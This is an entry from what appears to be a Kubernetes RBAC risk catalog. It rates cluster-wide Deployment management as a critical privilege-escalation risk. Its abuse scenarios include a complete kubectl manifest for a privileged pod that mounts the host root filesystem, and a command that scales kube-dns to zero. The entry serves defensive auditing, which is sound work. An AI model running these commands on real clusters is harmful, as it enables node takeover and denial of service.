Manage Deployments cluster-wide (potential for privileged pod execution)
Elevation of Privilege
Critical
Overview
| Field | Value |
|---|---|
| ID | 1033 |
| Name | Manage Deployments cluster-wide (potential for privileged pod execution) |
| Risk Category | Elevation of Privilege |
| Risk Level | Critical |
| Role Type | ClusterRole |
| API Groups | apps |
| Resources | deployments |
| Verbs | create, update, patch, delete |
| Tags | Persistence PrivilegeEscalation Tampering WorkloadLifecycle |
Description
Allows creating, updating, or deleting Deployments across all namespaces. Deployments manage pod replicas, and this permission can be used to deploy pods with privileged settings, leading to code execution, privilege escalation, persistence, and tampering with cluster workloads.
Abuse Scenarios
- Create a new Deployment with a privileged pod template.
kubectl create -n <namespace> -f - <<EOF
apiVersion: apps/v1
kind: Deployment
metadata:
name: privileged-deployment
spec:
replicas: 1
selector:
matchLabels:
app: privileged-app
template:
metadata:
labels:
app: privileged-app
spec:
hostNetwork: true
hostPID: true
containers:
- name: attacker
image: busybox
command: ["/bin/sh", "-c", "sleep infinity"]
securityContext:
privileged: true
volumeMounts:
- mountPath: /host
name: host-root
volumes:
- name: host-root
hostPath:
path: /
EOF
# Example: kubectl create -n default -f - <<EOF ... EOF
- Scale a critical deployment to zero replicas, causing denial of service.
kubectl scale deployment <deployment-name> -n <namespace> --replicas=0
# Example: kubectl scale deployment kube-dns -n kube-system --replicas=0